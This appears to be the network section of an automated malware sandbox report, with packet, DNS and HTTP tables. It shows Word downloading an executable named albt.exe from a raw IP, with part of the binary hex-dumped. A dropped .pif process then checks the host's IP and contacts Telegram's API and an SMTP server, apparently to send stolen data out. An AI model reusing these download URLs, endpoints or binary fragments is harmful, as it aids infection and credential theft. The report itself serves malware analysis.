Jan 14, 2025 08:09:03.864582062 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:03.869424105 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.154298067 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.154642105 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:04.159498930 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.426363945 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.426616907 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:04.431454897 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.458950996 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.459332943 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:04.464221954 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.702104092 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.702461958 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:04.707405090 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.761010885 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.761173010 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:04.765958071 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.974396944 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:04.974751949 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:04.979630947 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.034001112 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.034425020 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.039326906 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.247562885 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.253221989 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.258111000 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.342052937 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.342070103 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.342212915 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.343513966 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.348268032 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.524480104 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.524805069 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.524897099 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.524974108 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.524974108 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.524974108 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.529720068 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.529747009 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.529882908 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.529892921 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.529905081 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.529983044 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.529993057 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.530055046 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.530066013 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.530076981 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.619174957 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.625499964 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.630367994 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.817440033 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.865205050 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.914072990 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:05.914340019 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:05.919111967 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:06.184508085 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:06.184921026 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:06.189691067 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:06.460017920 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:06.460258007 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:06.465133905 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:06.731115103 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:06.731328011 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:06.736129045 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.002542019 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.002748966 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:07.007662058 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.274915934 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.275474072 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:07.275540113 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:07.275572062 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:07.275602102 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:07.280411005 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.280441999 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.280658960 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.280688047 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.561428070 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:07.630862951 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:09.091109037 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:09.095984936 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:09.361957073 CET	587	52830	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:09.362395048 CET	52830	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:09.363241911 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:09.368165016 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:09.368247032 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:10.523623943 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:10.523766041 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:10.528686047 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:10.830905914 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:10.831171036 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:10.836165905 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.102493048 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.103156090 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:11.108196974 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.396657944 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.396699905 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.397010088 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:11.400938988 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:11.405797005 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.669939041 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.671030998 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:11.676011086 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.960167885 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:11.960457087 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:11.965359926 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:12.230221033 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:12.230477095 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:12.235408068 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:12.503402948 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:12.504069090 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:12.509423971 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:12.773952961 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:12.774121046 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:12.779001951 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.043935061 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.044260979 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:13.049211025 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.313301086 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.313623905 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:13.313832045 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:13.313832045 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:13.313832045 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:13.313886881 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:13.318547964 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318696022 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318708897 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318730116 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318742037 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318805933 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318818092 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318907976 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318960905 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.318973064 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.767611980 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:09:13.818242073 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:09:14.047864914 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:10:24.679536104 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:10:24.684626102 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:10:24.951133013 CET	587	52789	46.151.208.21	192.168.2.4
Jan 14, 2025 08:10:24.951828003 CET	52789	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:10:35.163271904 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:10:35.168270111 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:10:35.436491013 CET	587	52814	46.151.208.21	192.168.2.4
Jan 14, 2025 08:10:35.437239885 CET	52814	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:10:43.662379026 CET	52866	587	192.168.2.4	46.151.208.21
Jan 14, 2025 08:10:43.667431116 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:10:43.932610989 CET	587	52866	46.151.208.21	192.168.2.4
Jan 14, 2025 08:10:43.935902119 CET	52866	587	192.168.2.4	46.151.208.21

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 08:08:13.224683046 CET	52574	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:13.236855984 CET	53	52574	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:22.166136980 CET	58900	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:22.172703028 CET	53	58900	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:23.758105993 CET	57979	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:23.765279055 CET	53	57979	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:25.504534006 CET	53	59654	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:36.867299080 CET	50591	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:36.873936892 CET	53	50591	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:44.660156965 CET	64151	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:45.115178108 CET	53	64151	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 08:08:13.224683046 CET	192.168.2.4	1.1.1.1	0x2e53	Standard query (0)	amazonenviro.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:22.166136980 CET	192.168.2.4	1.1.1.1	0x5eb0	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.758105993 CET	192.168.2.4	1.1.1.1	0xa216	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:36.867299080 CET	192.168.2.4	1.1.1.1	0xa3dc	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:44.660156965 CET	192.168.2.4	1.1.1.1	0xa0c1	Standard query (0)	mail.irco.com.sa	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 08:08:13.236855984 CET	1.1.1.1	192.168.2.4	0x2e53	No error (0)	amazonenviro.com		166.62.27.188	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:22.172703028 CET	1.1.1.1	192.168.2.4	0x5eb0	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 08:08:22.172703028 CET	1.1.1.1	192.168.2.4	0x5eb0	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:22.172703028 CET	1.1.1.1	192.168.2.4	0x5eb0	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:22.172703028 CET	1.1.1.1	192.168.2.4	0x5eb0	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:22.172703028 CET	1.1.1.1	192.168.2.4	0x5eb0	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:22.172703028 CET	1.1.1.1	192.168.2.4	0x5eb0	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:23.765279055 CET	1.1.1.1	192.168.2.4	0xa216	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:36.873936892 CET	1.1.1.1	192.168.2.4	0xa3dc	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:08:45.115178108 CET	1.1.1.1	192.168.2.4	0xa0c1	No error (0)	mail.irco.com.sa		46.151.208.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

amazonenviro.com

reallyfreegeoip.org

api.telegram.org

147.124.216.113

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	147.124.216.113	80	7688	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:10.904203892 CET	181	OUT	GET /albt.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 147.124.216.113
Jan 14, 2025 08:08:11.440207958 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 13 Jan 2025 01:10:58 GMT Accept-Ranges: bytes ETag: "9ca0aa05865db1:0" Server: Microsoft-IIS/8.5 Date: Tue, 14 Jan 2025 07:08:10 GMT Content-Length: 1443328 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 22 06 00 00 e0 0f 00 00 00 00 00 70 37 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*"p7@@@%p&Lq.text `.itext0 `.data`@ &@.bss6`F.idata%&F@.tls4l.rdatal@@.relocLqrn@B.rsrc&p&@@@@
Jan 14, 2025 08:08:11.440237999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@@<@$<@(
Jan 14, 2025 08:08:11.440253973 CET	1236	IN	Data Raw: c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 df 68 38 8b 48 40 89 4a 40 df 7a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 83 e9 0c 01 c8 01 ca f7 d9 79 13 df 2c 01 df 6c 01 08 df 7c 11 08 df 3c Data Ascii: (hhhh h(h0h8H@J@z8z0z(z zzz:@y,l\|<x,<DD@,<xH9JtgF!$gFu! gF0!gFQ9P
Jan 14, 2025 08:08:11.440269947 CET	1236	IN	Data Raw: 08 c7 46 0c 01 00 00 00 89 73 10 8d 46 20 0f b7 4b 02 8d 14 01 89 53 08 01 f7 29 cf 89 7b 0c c6 03 00 89 70 fc 5f 5e 5b c3 90 b8 00 01 00 00 f0 0f b0 25 14 67 46 00 74 3f 6a 00 e8 76 f9 ff ff b8 00 01 00 00 f0 0f b0 25 14 67 46 00 74 29 6a 0a e8 Data Ascii: FsF KS){p_^[%gFt?jv%gFt)j`=,0u#$gFt^# gFt$gF5gF)rgF)gFgFX
Jan 14, 2025 08:08:11.440288067 CET	896	IN	Data Raw: 72 0a 8d 04 2e 89 da e8 12 f7 ff ff c6 05 14 67 46 00 00 89 f0 5d 5f 5e 5b c3 89 d7 89 d0 e8 1f f9 ff ff 85 c0 74 16 89 c5 89 c2 89 f0 89 f9 e8 8e f6 ff ff 89 f0 e8 6f fc ff ff 89 e8 5d 5f 5e 5b c3 8b 47 fc a8 01 0f 84 e1 00 00 00 83 e0 f0 8d 2c Data Ascii: r.gF]_^[to]_^[G,9=I`FtO%gFt'QRjfZY%gFtQRjLZY#^Gt~,9wt=0rQRZY1)!%0U)w$.
Jan 14, 2025 08:08:11.477561951 CET	1236	IN	Data Raw: ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 17 81 e2 ff ff 7f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 16 81 e2 ff ff 3f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 Data Ascii: 00?000G_@SV^[USVE@;rMMA;sjEPP"}<E@UB;v'E
Jan 14, 2025 08:08:11.477612019 CET	1236	IN	Data Raw: ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8 47 fe ff 89 b4 85 d8 07 fe ff ff 85 f8 47 fe ff 8b 5b 04 81 fb a8 87 46 00 74 0c 81 bd f8 47 fe ff 00 10 00 00 7c b5 80 bd ff 47 fe ff 00 0f 85 58 02 00 00 c6 85 f7 47 fe ff 00 33 c0 89 85 e8 47 Data Ascii: sGG[FtG\|GXG3GX)@(AG7GB@FOGGGGG;>Gu)@'GGu
Jan 14, 2025 08:08:11.477648020 CET	1236	IN	Data Raw: 87 46 00 5f 5e 5b c3 8d 40 00 53 56 57 55 bb 04 67 46 00 be a8 87 46 00 8b 7b 04 eb 12 8b 6f 04 68 00 80 00 00 6a 00 57 e8 85 e7 ff ff 8b fd 3b fb 75 ea ba 37 00 00 00 b8 40 40 46 00 8b c8 89 48 14 8b c8 89 48 04 c7 40 08 01 00 00 00 33 c9 89 48 Data Ascii: F_^[@SVWUgFF{ohjW;u7@@FHH@3H Ju[gF@Ju^{hjS(;u6v]_^[=FtFP3F=eFtc=FthjFP3F @t
Jan 14, 2025 08:08:11.477679968 CET	1236	IN	Data Raw: 76 0d 0f b6 03 88 44 35 00 43 46 3b fb 77 f3 80 3b 20 77 a1 8b c3 5a 5d 5f 5e 5b c3 8b c0 53 56 57 81 c4 f8 fe ff ff 8b da 8b f0 8b c3 e8 70 17 00 00 85 f6 75 1e 68 05 01 00 00 8d 44 24 04 50 6a 00 e8 c3 e1 ff ff 8b c8 8b d4 8b c3 e8 40 18 00 00 Data Ascii: vD5CF;w; wZ]_^[SVWpuhD$Pj@t;tN_^[S1i@FB@F[f$@F-$@Fj<$X<$XZ=(`Ft(`FSHftIfs
Jan 14, 2025 08:08:11.477718115 CET	1236	IN	Data Raw: 00 7d 46 89 c2 83 e2 1f 8d 14 92 db ac 53 87 35 40 00 de f9 c1 e8 05 74 34 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 bd 36 40 00 de f9 c1 e8 04 74 1c 8d 04 80 db ac 43 53 37 40 00 de f9 eb 0e dd d8 db ab 7d 35 40 00 eb 04 dd d8 d9 ee 5b c3 00 00 00 Data Ascii: }FS5@t4tS6@tCS7@}5@[?@@@@@P@$@@ @(k@ @@C#@&@**@ -@
Jan 14, 2025 08:08:11.477751970 CET	1236	IN	Data Raw: c1 e9 02 49 f3 ab 59 83 e1 03 f3 aa 89 d0 89 e2 8b 4b b8 85 c9 74 01 51 8b 5b dc 85 db 74 04 8b 1b eb ed 39 d4 74 1d 5b 8b 0b 83 c3 04 8b 73 10 85 f6 74 06 8b 7b 14 89 34 07 83 c3 1c 49 75 ed 39 d4 75 e3 5f 5e 5b c3 8b c0 53 56 89 c3 89 c6 8b 36 Data Ascii: IYKtQ[t9t[st{4Iu9u_^[SV6Vvtu^[sr!,&@USVW3]U3Uh ;@d0d 3Uct1Ct>>t!PPMS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49754	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 08:08:22.196283102 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 08:08:23.021819115 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 08:08:23.025568008 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:23.304986000 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 08:08:24.650568962 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 08:08:24.938235044 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	52742	132.226.8.169	80	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
